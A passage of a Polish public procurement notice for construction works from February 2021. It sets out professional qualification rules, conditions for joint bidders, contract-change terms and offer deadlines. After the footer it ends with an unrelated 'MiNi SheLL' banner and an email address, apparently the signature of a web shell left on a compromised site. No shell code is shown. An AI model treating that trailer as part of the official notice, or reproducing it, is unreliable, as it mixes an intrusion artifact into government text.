ObszarzeGospodarczym, Konfederacji Szwajcarskiej, na zasadach określonych w ustawie z dnia 22grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwachczłonkowskich Unii Europejskiej (Dz.U. z 2020 r. poz. 220, z późn. zm.). W przypadku osób, które są obywatelami państw członkowskich Unii Europejskiej, KonfederacjiSzwajcarskiej oraz państwa członkowskich Europejskiego Porozumienia o Wolnym Handlu(EFTA) – stron umowy o Europejskim Obszarze Gospodarczym (w rozumieniu art. 4a ust. 2ustawy z dnia 15 grudnia 2000r. o samorządach zawodowych architektów oraz inżynierówbudownictwa (Dz.U. z 2019 r. poz. 1117), osoby wyznaczone do realizacji zamówienia posiadająuprawnienia budowlane do kierowania robotami budowlanymi, jeżeli:- nabyły kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznacznejwykonywaniu samodzielnych funkcji technicznych w budownictwie na terytoriumRzeczypospolitej Polskiej, odpowiadające posiadaniu uprawnień budowlanych do kierowaniarobotami budowlanymi oraz- posiadają odpowiednią decyzję o uznaniu kwalifikacji zawodowych lub w przypadku brakudecyzji o uznaniu kwalifikacji zawodowych – zostały spełnione w stosunku do tych osóbwymagania, o których mowa w art. 20a ust. 2-6 ustawy z dnia 15 grudnia 2000r. o samorządachzawodowych architektów oraz inżynierów budownictwa (Dz.U. z 2019 r. poz. 1117), dotyczące świadczenia usług transgranicznych.5.2.W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:1) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowychlub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogąpolegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi,do realizacji których te zdolności są wymagane.2) W przypadkac do warunku sytuacji ekonomicznej lub finansowej, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający zawrze umowę w sprawie zamówienia na warunkach określonych we wzorze umowy, który stanowi załącznik nr 6 do SWZ.2. Zamawiający przewiduje możliwość zmian postanowień umowy w sprawie zamówienia w stosunku do treści wybranej oferty na warunkach określonych we wzorze umowy stanowiącej załącznik nr 6 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-02-26 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1.Wykonawca składa ofertę za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu. Sposób złożenia oferty opisany został w Instrukcji użytkownika dostępnej na miniPortalu. zał. nr 5.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-02-26 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-03-28</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-02-11 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com